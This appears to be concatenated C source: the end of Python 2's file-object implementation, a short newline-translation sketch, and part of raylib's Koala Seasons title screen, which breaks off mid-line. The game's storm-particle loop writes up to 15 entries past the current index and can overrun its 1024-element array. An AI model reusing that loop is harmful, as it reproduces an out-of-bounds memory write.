Add a 'b' to the mode for binary files.\n" "Add a '+' to the mode to allow simultaneous reading and writing.\n" "If the buffering argument is given, 0 means unbuffered, 1 means line\n" "buffered, and larger numbers specify the buffer size. The preferred way\n" "to open a file is with the builtin open() function.\n" ) PyDoc_STR( "Add a 'U' to mode to open the file for input with universal newline\n" "support. Any line ending in the input file will be seen as a '\\n'\n" "in Python. Also, a file so opened gains the attribute 'newlines';\n" "the value for this attribute is one of None (no newline read yet),\n" "'\\r', '\\n', '\\r\\n' or a tuple containing all the newline types seen.\n" "\n" "'U' cannot be combined with 'w' or '+' mode.\n" ); PyTypeObject PyFile_Type = { PyVarObject_HEAD_INIT(&PyType_Type, 0) "file", sizeof(PyFileObject), 0, (destructor)file_dealloc, /* tp_dealloc */ 0, /* tp_print */ 0, /* tp_getattr */ 0, /* tp_setattr */ 0, /* tp_compare */ (reprfunc)file_repr, /* tp_repr */ 0, /* tp_as_number */ 0, /* tp_as_sequence */ 0, /* tp_as_mapping */ 0, /* tp_hash */ 0, /* tp_call */ 0, /* tp_str */ PyObject_GenericGetAttr, /* tp_getattro */ /* softspace is writable: we must supply tp_setattro */ PyObject_GenericSetAttr, /* tp_setattro */ 0, /* tp_as_buffer */ Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE | Py_TPFLAGS_HAVE_WEAKREFS, /* tp_flags */ file_doc, /* tp_doc */ 0, /* tp_traverse */ 0, /* tp_clear */ 0, /* tp_richcompare */ offsetof(PyFileObject, weakreflist), /* tp_weaklistoffset */ (getiterfunc)file_self, /* tp_iter */ (iternextfunc)file_iternext, /* tp_iternext */ file_methods, /* tp_methods */ file_memberlist, /* tp_members */ file_getsetlist, /* tp_getset */ 0, /* tp_base */ 0, /* tp_dict */ 0, /* tp_descr_get */ 0, /* tp_descr_set */ 0, /* tp_dictoffset */ file_init, /* tp_init */ PyType_GenericAlloc, /* tp_alloc */ file_new, /* tp_new */ PyObject_Del, /* tp_free */ }; /* Interface for the 'soft space' between print items. */ int PyFile_SoftSpace(PyObject *f, int newflag) { long oldflag = 0; if (f == NULL) { /* Do nothing */ } else if (PyFile_Check(f)) { oldflag = ((PyFileObject *)f)->f_softspace; ((PyFileObject *)f)->f_softspace = newflag; } else { PyObject *v; v = PyObject_GetAttrString(f, "softspace"); if (v == NULL) PyErr_Clear(); else { if (PyInt_Check(v)) oldflag = PyInt_AsLong(v); assert(oldflag < INT_MAX); Py_DECREF(v); } v = PyInt_FromLong((long)newflag); if (v == NULL) PyErr_Clear(); else { if (PyObject_SetAttrString(f, "softspace", v) != 0) PyErr_Clear(); Py_DECREF(v); } } return (int)oldflag; } /* Interfaces to write objects/strings to file-like objects */ int PyFile_WriteObject(PyObject *v, PyObject *f, int flags) { PyObject *writer, *value, *args, *result; if (f == NULL) { PyErr_SetString(PyExc_TypeError, "writeobject with NULL file"); return -1; } else if (PyFile_Check(f)) { PyFileObject *fobj = (PyFileObject *) f; #ifdef Py_USING_UNICODE PyObject *enc = fobj->f_encoding; int result; #endif if (fobj->f_fp == NULL) { err_closed(); return -1; } #ifdef Py_USING_UNICODE if ((flags & Py_PRINT_RAW) && PyUnicode_Check(v) && enc != Py_None) { char *cenc = PyString_AS_STRING(enc); char *errors = fobj->f_errors == Py_None ? 
"strict" : PyString_AS_STRING(fobj->f_errors); value = PyUnicode_AsEncodedString(v, cenc, errors); if (value == NULL) return -1; } else { value = v; Py_INCREF(value); } result = file_PyObject_Print(value, fobj, flags); Py_DECREF(value); return result; #else return file_PyObject_Print(v, fobj, flags); #endif } writer = PyObject_GetAttrString(f, "write"); if (writer == NULL) return -1; if (flags & Py_PRINT_RAW) { if (PyUnicode_Check(v)) { value = v; Py_INCREF(value); } else value = PyObject_Str(v); } else value = PyObject_Repr(v); if (value == NULL) { Py_DECREF(writer); return -1; } args = PyTuple_Pack(1, value); if (args == NULL) { Py_DECREF(value); Py_DECREF(writer); return -1; } result = PyEval_CallObject(writer, args); Py_DECREF(args); Py_DECREF(value); Py_DECREF(writer); if (result == NULL) return -1; Py_DECREF(result); return 0; } int PyFile_WriteString(const char *s, PyObject *f) { if (f == NULL) { /* Should be caused by a pre-existing error */ if (!PyErr_Occurred()) PyErr_SetString(PyExc_SystemError, "null file for PyFile_WriteString"); return -1; } else if (PyFile_Check(f)) { PyFileObject *fobj = (PyFileObject *) f; FILE *fp = PyFile_AsFile(f); if (fp == NULL) { err_closed(); return -1; } FILE_BEGIN_ALLOW_THREADS(fobj) fputs(s, fp); FILE_END_ALLOW_THREADS(fobj) return 0; } else if (!PyErr_Occurred()) { PyObject *v = PyString_FromString(s); int err; if (v == NULL) return -1; err = PyFile_WriteObject(v, f, Py_PRINT_RAW); Py_DECREF(v); return err; } else return -1; } /* Try to get a file-descriptor from a Python object. If the object is an integer or long integer, its value is returned. If not, the object's fileno() method is called if it exists; the method must return an integer or long integer, which is returned as the file descriptor value. -1 is returned on failure. */ int PyObject_AsFileDescriptor(PyObject *o) { int fd; PyObject *meth; if (PyInt_Check(o)) { fd = _PyInt_AsInt(o); } else if (PyLong_Check(o)) { fd = _PyLong_AsInt(o); } else if ((meth = PyObject_GetAttrString(o, "fileno")) != NULL) { PyObject *fno = PyEval_CallObject(meth, NULL); Py_DECREF(meth); if (fno == NULL) return -1; if (PyInt_Check(fno)) { fd = _PyInt_AsInt(fno); Py_DECREF(fno); } else if (PyLong_Check(fno)) { fd = _PyLong_AsInt(fno); Py_DECREF(fno); } else { PyErr_SetString(PyExc_TypeError, "fileno() returned a non-integer"); Py_DECREF(fno); return -1; } } else { PyErr_SetString(PyExc_TypeError, "argument must be an int, or have a fileno() method"); return -1; } if (fd < 0) { PyErr_Format(PyExc_ValueError, "file descriptor cannot be a negative integer (%i)", fd); return -1; } return fd; } /* From here on we need access to the real fgets and fread */ #undef fgets #undef fread /* ** Py_UniversalNewlineFgets is an fgets variation that understands ** all of \r, \n and \r\n conventions. ** The stream should be opened in binary mode. ** If fobj is NULL the routine always does newline conversion, and ** it may peek one char ahead to gobble the second char in \r\n. ** If fobj is non-NULL it must be a PyFileObject. In this case there ** is no readahead but in stead a flag is used to skip a following ** \n on the next read. Also, if the file is open in binary mode ** the whole conversion is skipped. Finally, the routine keeps track of ** the different types of newlines seen. ** Note that we need no error handling: fgets() treats error and eof ** identically. 
*/ char * Py_UniversalNewlineFgets(char *buf, int n, FILE *stream, PyObject *fobj) { char *p = buf; int c; int newlinetypes = 0; int skipnextlf = 0; int univ_newline = 1; if (fobj) { if (!PyFile_Check(fobj)) { errno = ENXIO; /* What can you do... */ return NULL; } univ_newline = ((PyFileObject *)fobj)->f_univ_newline; if ( !univ_newline ) return fgets(buf, n, stream); newlinetypes = ((PyFileObject *)fobj)->f_newlinetypes; skipnextlf = ((PyFileObject *)fobj)->f_skipnextlf; } FLOCKFILE(stream); c = 'x'; /* Shut up gcc warning */ while (--n > 0 && (c = GETC(stream)) != EOF ) { if (skipnextlf ) { skipnextlf = 0; if (c == '\n') { /* Seeing a \n here with skipnextlf true ** means we saw a \r before. */ newlinetypes |= NEWLINE_CRLF; c = GETC(stream); if (c == EOF) break; } else { /* ** Note that c == EOF also brings us here, ** so we're okay if the last char in the file ** is a CR. */ newlinetypes |= NEWLINE_CR; } } if (c == '\r') { /* A \r is translated into a \n, and we skip ** an adjacent \n, if any. We don't set the ** newlinetypes flag until we've seen the next char. */ skipnextlf = 1; c = '\n'; } else if ( c == '\n') { newlinetypes |= NEWLINE_LF; } *p++ = c; if (c == '\n') break; } if ( c == EOF && skipnextlf ) newlinetypes |= NEWLINE_CR; FUNLOCKFILE(stream); *p = '\0'; if (fobj) { ((PyFileObject *)fobj)->f_newlinetypes = newlinetypes; ((PyFileObject *)fobj)->f_skipnextlf = skipnextlf; } else if ( skipnextlf ) { /* If we have no file object we cannot save the ** skipnextlf flag. We have to readahead, which ** will cause a pause if we're reading from an ** interactive stream, but that is very unlikely ** unless we're doing something silly like ** execfile("/dev/tty"). */ c = GETC(stream); if ( c != '\n' ) ungetc(c, stream); } if (p == buf) return NULL; return buf; } /* ** Py_UniversalNewlineFread is an fread variation that understands ** all of \r, \n and \r\n conventions. ** The stream should be opened in binary mode. ** fobj must be a PyFileObject. In this case there ** is no readahead but in stead a flag is used to skip a following ** \n on the next read. Also, if the file is open in binary mode ** the whole conversion is skipped. Finally, the routine keeps track of ** the different types of newlines seen. */ size_t Py_UniversalNewlineFread(char *buf, size_t n, FILE *stream, PyObject *fobj) { char *dst = buf; PyFileObject *f = (PyFileObject *)fobj; int newlinetypes, skipnextlf; assert(buf != NULL); assert(stream != NULL); if (!fobj || !PyFile_Check(fobj)) { errno = ENXIO; /* What can you do... */ return 0; } if (!f->f_univ_newline) return fread(buf, 1, n, stream); newlinetypes = f->f_newlinetypes; skipnextlf = f->f_skipnextlf; /* Invariant: n is the number of bytes remaining to be filled * in the buffer. */ while (n) { size_t nread; int shortread; char *src = dst; nread = fread(dst, 1, n, stream); assert(nread <= n); if (nread == 0) break; n -= nread; /* assuming 1 byte out for each in; will adjust */ shortread = n != 0; /* true iff EOF or error */ while (nread--) { char c = *src++; if (c == '\r') { /* Save as LF and set flag to skip next LF. */ *dst++ = '\n'; skipnextlf = 1; } else if (skipnextlf && c == '\n') { /* Skip LF, and remember we saw CR LF. */ skipnextlf = 0; newlinetypes |= NEWLINE_CRLF; ++n; } else { /* Normal char to be stored in buffer. Also * update the newlinetypes flag if either this * is an LF or the previous char was a CR. 
*/ if (c == '\n') newlinetypes |= NEWLINE_LF; else if (skipnextlf) newlinetypes |= NEWLINE_CR; *dst++ = c; skipnextlf = 0; } } if (shortread) { /* If this is EOF, update type flags. */ if (skipnextlf && feof(stream)) newlinetypes |= NEWLINE_CR; break; } } f->f_newlinetypes = newlinetypes; f->f_skipnextlf = skipnextlf; return dst - buf; } #ifdef __cplusplus } #endif
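/* A minimal standalone sketch of the newline state machine implemented by
 * Py_UniversalNewlineFread above: '\r' is emitted as '\n', and a flag is
 * carried across chunks so that the '\n' of a "\r\n" pair split between two
 * reads is still dropped. Helper names here are hypothetical illustrations,
 * not CPython API. */
#include <stdio.h>

/* Translate one chunk: CR becomes LF, and an LF that directly follows a CR
 * is swallowed. '*skipnextlf' persists between calls, like f_skipnextlf. */
static size_t univ_newline_chunk(char *dst, const char *src, size_t n,
                                 int *skipnextlf)
{
    char *out = dst;
    while (n--) {
        char c = *src++;
        if (c == '\r') {
            *out++ = '\n';          /* store CR as LF, remember to skip LF */
            *skipnextlf = 1;
        } else if (*skipnextlf && c == '\n') {
            *skipnextlf = 0;        /* second half of a CR LF pair: drop it */
        } else {
            *out++ = c;
            *skipnextlf = 0;
        }
    }
    return (size_t)(out - dst);
}

int main(void)
{
    char buf[16];
    int skip = 0;
    /* "a\r" and "\nb" arrive as separate reads: the CR LF spans the split. */
    size_t len = univ_newline_chunk(buf, "a\r", 2, &skip);
    len += univ_newline_chunk(buf + len, "\nb", 2, &skip);
    buf[len] = '\0';
    printf("%s\n", buf);            /* prints "a" then "b": one LF kept */
    return 0;
}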
73234.c
/********************************************************************************************** * * raylib - Koala Seasons game * * Title Screen Functions Definitions (Init, Update, Draw, Unload) * * Copyright (c) 2014-2016 Ramon Santamaria (@raysan5) * * This software is provided "as-is", without any express or implied warranty. In no event * will the authors be held liable for any damages arising from the use of this software. * * Permission is granted to anyone to use this software for any purpose, including commercial * applications, and to alter it and redistribute it freely, subject to the following restrictions: * * 1. The origin of this software must not be misrepresented; you must not claim that you * wrote the original software. If you use this software in a product, an acknowledgment * in the product documentation would be appreciated but is not required. * * 2. Altered source versions must be plainly marked as such, and must not be misrepresented * as being the original software. * * 3. This notice may not be removed or altered from any source distribution. * **********************************************************************************************/ #include "raylib.h" #include "screens.h" #include <math.h> #include "atlas01.h" #include "atlas02.h" #define MAX_DURATION 120 #define MAX_particle 128 //---------------------------------------------------------------------------------- // Global Variables Definition (local to this module) //---------------------------------------------------------------------------------- typedef struct { Vector2 position; Vector2 speed; float rotation; float size; Color color; float alpha; float rotPhy; bool active; } Particle; typedef struct { Vector2 position; Color color; float alpha; float size; float rotation; bool active; // NOTE: Use it to activate/deactive particle bool fading; float delayCounter; } RayParticleTitle; typedef struct { Vector2 position; bool active; int spawnTime; int maxTime; Particle particle[1024]; } Stormparticleystem; typedef struct { Vector2 position; bool active; int spawnTime; int maxTime; Particle particle[MAX_particle]; } particleystemTitle; typedef struct { Vector2 position; bool active; int spawnTime; int maxTime; RayParticleTitle particle[20]; } RayparticleystemTitle; // Title screen global variables static int framesCounter; static int finishScreen; static int globalFrameCounter; static int currentFrame; static int thisFrame; static int parallaxBackOffset; static int parallaxFrontOffset; static float currentValue1; static float currentValue2; static float initValue1; static float initValue2; static float finishValue1; static float finishValue2; static float duration; static Vector2 fontSize; static bool soundActive; static bool musicActive; static Rectangle koalaMenu; static Rectangle bamboo[5]; static Rectangle player = {0, 0, 0, 0}; static Rectangle soundButton; static Rectangle speakerButton; static Color color00, color01, color02, color03; static particleystemTitle snowParticle; static particleystemTitle backSnowParticle; static particleystemTitle dandelionParticle; static particleystemTitle dandelionBackParticle; static particleystemTitle planetreeParticle; static particleystemTitle backPlanetreeParticle; static particleystemTitle flowerParticle; static particleystemTitle backFlowerParticle; static particleystemTitle rainParticle; static particleystemTitle backRainParticle; static RayparticleystemTitle rayparticle; static RayparticleystemTitle backRayparticle; static Stormparticleystem 
rainStormParticle; static Stormparticleystem snowStormParticle; const char pressToPlay[16] = "Press to play"; //---------------------------------------------------------------------------------- // Title Screen Functions Definition //---------------------------------------------------------------------------------- static void DrawParallaxFront(void); static void DrawParallaxMiddle(void); static void DrawParallaxBack(void); static float BounceEaseOut(float t,float b , float c, float d); // Title Screen Initialization logic void InitTitleScreen(void) { framesCounter = 0; finishScreen = 0; initValue1 = -100; finishValue1 = 100; initValue2 = 700; finishValue2 = finishValue1 + 220; duration = MAX_DURATION; initSeason = GetRandomValue(0, 3); soundActive = true; musicActive = true; parallaxBackOffset = GetRandomValue(10, 100); parallaxFrontOffset = GetRandomValue(100, 200); rainChance = GetRandomValue(0, 100); snowParticle.position = (Vector2){ 0, 0 }; snowParticle.active = false; backSnowParticle.position = (Vector2){ 0, 0 }; backSnowParticle.active = false; planetreeParticle.position = (Vector2){ 0, 0 }; planetreeParticle.active = false; backPlanetreeParticle.position = (Vector2){ 0, 0 }; backPlanetreeParticle.active = false; dandelionParticle.active = false; dandelionBackParticle.position = (Vector2){ 0, 0}; flowerParticle.position = (Vector2){ 0, 0 }; flowerParticle.active = false; backFlowerParticle.position = (Vector2){ 0, 0 }; backFlowerParticle.active = false; rayparticle.position = (Vector2){ 0, 0 }; rayparticle.active = false; backRayparticle.position = (Vector2){ 0, 0 }; backRayparticle.active = false; rainStormParticle.position = (Vector2){ 0, 0 }; rainStormParticle.active = false; snowStormParticle.position = (Vector2){ 0, 0 }; snowStormParticle.active = false; soundButton = (Rectangle){ GetScreenWidth()*0.85, GetScreenHeight()*0.7, title_music_on.width, title_music_on.height }; speakerButton = (Rectangle){ GetScreenWidth()*0.85, GetScreenHeight()*0.85, title_speaker_on.width, title_speaker_on.height }; for (int j = 0; j < MAX_particle; j++) { snowParticle.particle[j].active = false; snowParticle.particle[j].position = (Vector2){ 0, 0 }; snowParticle.particle[j].size = (float)GetRandomValue(3, 9)/10; snowParticle.particle[j].rotation = GetRandomValue(0, 360); snowParticle.particle[j].color = WHITE; snowParticle.particle[j].alpha = 1.0f; backSnowParticle.particle[j].active = false; backSnowParticle.particle[j].position = (Vector2){ 0, 0 }; backSnowParticle.particle[j].size = (float)GetRandomValue(2, 8)/10; backSnowParticle.particle[j].rotation = GetRandomValue(0, 360); backSnowParticle.particle[j].color = WHITE; backSnowParticle.particle[j].alpha = 0.7f; planetreeParticle.particle[j].active = false; planetreeParticle.particle[j].position = (Vector2){ 0, 0 }; planetreeParticle.particle[j].size = (float)GetRandomValue(3, 9)/10; planetreeParticle.particle[j].rotation = GetRandomValue(0, 360); planetreeParticle.particle[j].color = WHITE; planetreeParticle.particle[j].alpha = 1.0f; backPlanetreeParticle.particle[j].active = false; backPlanetreeParticle.particle[j].position = (Vector2){ 0, 0 }; backPlanetreeParticle.particle[j].size = (float)GetRandomValue(2, 8)/10; backPlanetreeParticle.particle[j].rotation = GetRandomValue(0, 360); backPlanetreeParticle.particle[j].color = WHITE; backPlanetreeParticle.particle[j].alpha = 0.7f; dandelionParticle.particle[j].active = false; dandelionParticle.particle[j].position = (Vector2){ 0, 0 }; dandelionParticle.particle[j].size = 
(float)GetRandomValue(3, 9)/10; dandelionParticle.particle[j].rotation = 0; dandelionParticle.particle[j].color = WHITE; dandelionParticle.particle[j].alpha = 1; dandelionParticle.particle[j].rotPhy = GetRandomValue(0 , 180); dandelionBackParticle.particle[j].active = false; dandelionBackParticle.particle[j].position = (Vector2){ 0, 0 }; dandelionBackParticle.particle[j].size = (float)GetRandomValue(2, 8)/10; dandelionBackParticle.particle[j].rotation = 0; dandelionBackParticle.particle[j].color = WHITE; dandelionBackParticle.particle[j].alpha = 0.7f; dandelionBackParticle.particle[j].rotPhy = GetRandomValue(0 , 180); flowerParticle.particle[j].active = false; flowerParticle.particle[j].position = (Vector2){ 0, 0 }; flowerParticle.particle[j].size = (float)GetRandomValue(3, 9)/10; flowerParticle.particle[j].rotation = GetRandomValue(0, 360); flowerParticle.particle[j].color = WHITE; flowerParticle.particle[j].alpha = 1.0f; backFlowerParticle.particle[j].active = false; backFlowerParticle.particle[j].position = (Vector2){ 0, 0 }; backFlowerParticle.particle[j].size = (float)GetRandomValue(2, 8)/10; backFlowerParticle.particle[j].rotation = GetRandomValue(0, 360); backFlowerParticle.particle[j].color = WHITE; backFlowerParticle.particle[j].alpha = 0.7f; rainParticle.particle[j].active = false; rainParticle.particle[j].position = (Vector2){ 0, 0 }; rainParticle.particle[j].size = (float)GetRandomValue(3, 9)/10; rainParticle.particle[j].rotation = -20; rainParticle.particle[j].color = WHITE; rainParticle.particle[j].alpha = 1.0f; backRainParticle.particle[j].active = false; backRainParticle.particle[j].position = (Vector2){ 0, 0 }; backRainParticle.particle[j].size = (float)GetRandomValue(2, 8)/10; backRainParticle.particle[j].rotation = -20; backRainParticle.particle[j].color = WHITE; backRainParticle.particle[j].alpha = 0.7f; } for (int j = 0; j < 1024; j++) { rainStormParticle.particle[j].active = false; rainStormParticle.particle[j].position = (Vector2){ 0, 0 }; rainStormParticle.particle[j].size = (float)GetRandomValue(3, 9)/10; rainStormParticle.particle[j].rotation = -40; rainStormParticle.particle[j].color = WHITE; rainStormParticle.particle[j].alpha = 1.0f; } for (int j = 0; j < 256; j++) { snowStormParticle.particle[j].active = false; snowStormParticle.particle[j].position = (Vector2){ 0, 0 }; snowStormParticle.particle[j].size = (float)GetRandomValue(4, 8)/10; snowStormParticle.particle[j].rotation = 40; snowStormParticle.particle[j].color = WHITE; snowStormParticle.particle[j].alpha = 1.0f; } for (int i = 0; i < 20; i++) { rayparticle.particle[i].position = (Vector2){ 0, 0 }; rayparticle.particle[i].color.r = 255; rayparticle.particle[i].color.g = 255; rayparticle.particle[i].color.b = 182; rayparticle.particle[i].color.a = 255; rayparticle.particle[i].alpha = 0.0f; rayparticle.particle[i].size = (float)GetRandomValue(15, 20)/10; rayparticle.particle[i].rotation = 0.0f; rayparticle.particle[i].active = false; rayparticle.particle[i].fading = false; rayparticle.particle[i].delayCounter = 0; backRayparticle.particle[i].position = (Vector2){ 0, 0 }; backRayparticle.particle[i].color.r = 255; backRayparticle.particle[i].color.g = 255; backRayparticle.particle[i].color.b = 182; backRayparticle.particle[i].color.a = 255; backRayparticle.particle[i].alpha = 0.0f; backRayparticle.particle[i].size = (float)GetRandomValue(5, 10)/10; backRayparticle.particle[i].rotation = 0.0f; backRayparticle.particle[i].active = false; backRayparticle.particle[i].fading = false; 
backRayparticle.particle[i].delayCounter = 0; } for (int i = 0; i < 5; i++) { bamboo[i].x = 150 + 200*i; bamboo[i].y = 0; bamboo[i].width = 30; bamboo[i].height = GetScreenHeight(); } player.x = 350; player.y = 100; player.width = 35; player.height = 60; koalaMenu.x = gameplay_koala_menu.x; koalaMenu.y = gameplay_koala_menu.y; koalaMenu.width = gameplay_koala_menu.width/2; koalaMenu.height = gameplay_koala_menu.height; fontSize = MeasureTextEx(font, "PRESS TO PLAY", font.baseSize, 2); } // Title Screen Update logic void UpdateTitleScreen(void) { framesCounter += 1*TIME_FACTOR; globalFrameCounter += 1*TIME_FACTOR; if (framesCounter < duration) { currentValue1 = BounceEaseOut((float) framesCounter, initValue1, (finishValue1 - initValue1), duration); currentValue2 = BounceEaseOut((float) framesCounter, initValue2, (finishValue2 - initValue2), duration); } thisFrame += 1*TIME_FACTOR; if (thisFrame >= 40) { currentFrame++; thisFrame = 0; } if (currentFrame > 1) currentFrame = 0; koalaMenu.x = gameplay_koala_menu.x + koalaMenu.width*currentFrame; if (initSeason == 0) { dandelionParticle.active = true; dandelionBackParticle.active = true; rayparticle.active = true; backRayparticle.active = true; rainParticle.active = false; rainStormParticle.active = false; backRainParticle.active = false; color00 = (Color){129, 172, 86, 255}; // Summer Color color01 = (Color){145, 165, 125, 255}; color02 = (Color){161, 130, 73, 255}; color03 = (Color){198, 103, 51, 255}; } else if (initSeason == 1) { if (rainChance > 40) { planetreeParticle.active = true; backPlanetreeParticle.active = true; rainParticle.active = false; backRainParticle.active = false; } else if (rainChance <= 40 && rainChance > 15) { rainStormParticle.active = true; backRainParticle.active = false; } else if (rainChance <= 15) { rainStormParticle.active = true; backRainParticle.active = false; } color00 = (Color){242, 113, 62, 255}; // Fall Color color01 = (Color){190, 135, 114, 255}; color02 = (Color){144, 130, 101, 255}; color03 = (Color){214, 133, 58, 255}; } else if (initSeason == 2) { if (rainChance > 40) { snowParticle.active = true; backSnowParticle.active = true; } else { snowStormParticle.active = true; backSnowParticle.active = true; } rainParticle.active = false; rainStormParticle.active = false; backRainParticle.active = false; color00 = (Color){130, 130, 181, 255}; // Winter Color color01 = (Color){145, 145, 166, 255}; color02 = (Color){104, 142, 144, 255}; color03 = (Color){57, 140, 173, 255}; } else if (initSeason == 3) { flowerParticle.active = true; backFlowerParticle.active = true; rainParticle.active = false; rainStormParticle.active = false; backRainParticle.active = false; color00 = (Color){196, 176, 49, 255}; // Spring Color color01 = (Color){178, 163, 67, 255}; color02 = (Color){133, 143, 90, 255}; color03 = (Color){133, 156, 42, 255}; } // Snow Particle if (snowParticle.active) { snowParticle.spawnTime += 1*TIME_FACTOR; for (int i = 0; i < MAX_particle; i++) { if (!snowParticle.particle[i].active && snowParticle.spawnTime >= snowParticle.maxTime) { snowParticle.particle[i].active = true; snowParticle.particle[i].position = (Vector2){GetRandomValue(0, GetScreenWidth() + 200), -10}; snowParticle.spawnTime = 0; snowParticle.maxTime = GetRandomValue (5, 20); } } } if (backSnowParticle.active) { backSnowParticle.spawnTime += 1*TIME_FACTOR; for (int i = 0; i < MAX_particle; i++) { if (!backSnowParticle.particle[i].active && backSnowParticle.spawnTime >= backSnowParticle.maxTime) { backSnowParticle.particle[i].active = true; 
backSnowParticle.particle[i].position = (Vector2){GetRandomValue(0, GetScreenWidth() + 200), -10}; backSnowParticle.spawnTime = 0; backSnowParticle.maxTime = GetRandomValue (3, 10); } } } // Autumn leaves particle if (planetreeParticle.active) { planetreeParticle.spawnTime += 1*TIME_FACTOR; backPlanetreeParticle.spawnTime += 1*TIME_FACTOR; for (int i = 0; i < MAX_particle; i++) { if (!planetreeParticle.particle[i].active && planetreeParticle.spawnTime >= planetreeParticle.maxTime) { planetreeParticle.particle[i].active = true; planetreeParticle.particle[i].position = (Vector2){GetRandomValue(0, GetScreenWidth() + 200), -10}; planetreeParticle.spawnTime = 0; planetreeParticle.maxTime = GetRandomValue (5, 20); } if (!backPlanetreeParticle.particle[i].active && backPlanetreeParticle.spawnTime >= backPlanetreeParticle.maxTime) { backPlanetreeParticle.particle[i].active = true; backPlanetreeParticle.particle[i].position = (Vector2){GetRandomValue(0, GetScreenWidth() + 200), -10}; backPlanetreeParticle.spawnTime = 0; backPlanetreeParticle.maxTime = GetRandomValue (3, 10); } } } // Dandelion particle if (dandelionParticle.active) { dandelionParticle.spawnTime += 1*TIME_FACTOR; dandelionBackParticle.spawnTime += 1*TIME_FACTOR; for (int i = 0; i < MAX_particle; i++) { if (!dandelionParticle.particle[i].active && dandelionParticle.spawnTime >= dandelionParticle.maxTime) { dandelionParticle.particle[i].active = true; dandelionParticle.particle[i].position = (Vector2){GetRandomValue(0, GetScreenWidth() + 200), -10}; dandelionParticle.spawnTime = 0; dandelionParticle.maxTime = GetRandomValue (5, 20); } if (!dandelionBackParticle.particle[i].active && dandelionBackParticle.spawnTime >= dandelionBackParticle.maxTime) { dandelionBackParticle.particle[i].active = true; dandelionBackParticle.particle[i].position = (Vector2){GetRandomValue(0, GetScreenWidth() + 200), -10}; dandelionBackParticle.spawnTime = 0; dandelionBackParticle.maxTime = GetRandomValue (3, 10); } } } // Flower Particle if (flowerParticle.active) { flowerParticle.spawnTime += 1*TIME_FACTOR; backFlowerParticle.spawnTime += 1*TIME_FACTOR; for (int i = 0; i < MAX_particle; i++) { if (!flowerParticle.particle[i].active && flowerParticle.spawnTime >= flowerParticle.maxTime) { flowerParticle.particle[i].active = true; flowerParticle.particle[i].position = (Vector2){GetRandomValue(0, GetScreenWidth() + 200), -10}; flowerParticle.spawnTime = 0; flowerParticle.maxTime = GetRandomValue (5, 20); } if (!backFlowerParticle.particle[i].active && backFlowerParticle.spawnTime >= backFlowerParticle.maxTime) { backFlowerParticle.particle[i].active = true; backFlowerParticle.particle[i].position = (Vector2){GetRandomValue(0, GetScreenWidth() + 200), -10}; backFlowerParticle.spawnTime = 0; backFlowerParticle.maxTime = GetRandomValue (3, 10); } } } // Storm particle if (rainStormParticle.active) { rainStormParticle.spawnTime += 1*TIME_FACTOR; for (int i = 0; i < 1024; i++) { if (!rainStormParticle.particle[i].active && rainStormParticle.spawnTime >= rainStormParticle.maxTime) { for (int j = 0; j < 16; j++) { rainStormParticle.particle[i+j].active = true; rainStormParticle.particle[i+j].position = (Vector2){GetRandomValue(100, GetScreenWidth() + 1000), GetRandomValue(-10,-20)}; } rainStormParticle.spawnTime = 0; rainStormParticle.maxTime = 4; } } } // Snow Storm particle if (snowStormParticle.active) { snowStormParticle.spawnTime += 1*TIME_FACTOR; for (int i = 0; i < 256; i++) { if (!snowStormParticle.particle[i].active && snowStormParticle.spawnTime >= 
snowStormParticle.maxTime) { snowStormParticle.particle[i].active = true; snowStormParticle.particle[i].position = (Vector2){GetRandomValue(100, GetScreenWidth() + 800), -10}; snowStormParticle.spawnTime = 0; snowStormParticle.maxTime = GetRandomValue (1, 2); } } } if (rayparticle.active) { rayparticle.spawnTime += 1*TIME_FACTOR; backRayparticle.spawnTime += 1*TIME_FACTOR; for (int i = 0; i < 20; i++) { if (!rayparticle.particle[i].active && rayparticle.spawnTime >= rayparticle.maxTime) { //printf("PARTICLEEES"); rayparticle.particle[i].active = true; rayparticle.particle[i].alpha = 0.0f; rayparticle.particle[i].size = (float)(GetRandomValue(10, 20)/10); rayparticle.particle[i].position = (Vector2){GetRandomValue(300, GetScreenWidth() + 200), 0}; rayparticle.particle[i].rotation = -35; rayparticle.spawnTime = 0; rayparticle.particle[i].delayCounter = 0; rayparticle.maxTime = GetRandomValue (20, 50); } if (!backRayparticle.particle[i].active && backRayparticle.spawnTime >= backRayparticle.maxTime) { backRayparticle.particle[i].active = true; backRayparticle.particle[i].alpha = 0.0f; backRayparticle.particle[i].size = (float)(GetRandomValue(5, 15)/10); backRayparticle.particle[i].position = (Vector2){GetRandomValue(300, GetScreenWidth() + 200), 0}; backRayparticle.particle[i].rotation = -35; backRayparticle.spawnTime = 0; backRayparticle.particle[i].delayCounter = 0; backRayparticle.maxTime = GetRandomValue (20, 50); } } } if (rainParticle.active) { rainParticle.spawnTime += 1*TIME_FACTOR; for (int i = 0; i < MAX_particle; i++) { if (!rainParticle.particle[i].active && rainParticle.spawnTime >= rainParticle.maxTime) { rainParticle.particle[i].active = true; rainParticle.particle[i].position = (Vector2){GetRandomValue(0, GetScreenWidth() + 200), -10}; rainParticle.spawnTime = 0; rainParticle.maxTime = GetRandomValue (1, 8); } } } if (backRainParticle.active) { backRainParticle.spawnTime += 1*TIME_FACTOR; for (int i = 0; i < MAX_particle; i++) { if (!backRainParticle.particle[i].active && backRainParticle.spawnTime >= backRainParticle.maxTime) { backRainParticle.particle[i].active = true; backRainParticle.particle[i].position = (Vector2){GetRandomValue(0, GetScreenWidth() + 200), -10}; backRainParticle.spawnTime = 0; backRainParticle.maxTime = GetRandomValue (3, 10); } } } // particle Logic for (int i = 0; i < MAX_particle; i++) { if (snowParticle.particle[i].active) { snowParticle.particle[i].position.y += 2*TIME_FACTOR; snowParticle.particle[i].position.x -= 2*TIME_FACTOR; snowParticle.particle[i].rotation += 0.5*TIME_FACTOR; if (snowParticle.particle[i].position.y >= GetScreenHeight()) snowParticle.particle[i].active = false; } if (backSnowParticle.particle[i].active) { backSnowParticle.particle[i].position.y += 4*TIME_FACTOR; backSnowParticle.particle[i].position.x -= 3*TIME_FACTOR; backSnowParticle.particle[i].rotation += 0.5*TIME_FACTOR; if (backSnowParticle.particle[i].position.y >= GetScreenHeight()) backSnowParticle.particle[i].active = false; } if (planetreeParticle.particle[i].active) { planetreeParticle.particle[i].position.y += 4*TIME_FACTOR; planetreeParticle.particle[i].position.x -= 2*TIME_FACTOR; planetreeParticle.particle[i].rotation += 0.5*TIME_FACTOR; if (planetreeParticle.particle[i].position.y >= GetScreenHeight()) planetreeParticle.particle[i].active = false; } if (backPlanetreeParticle.particle[i].active) { backPlanetreeParticle.particle[i].position.y += 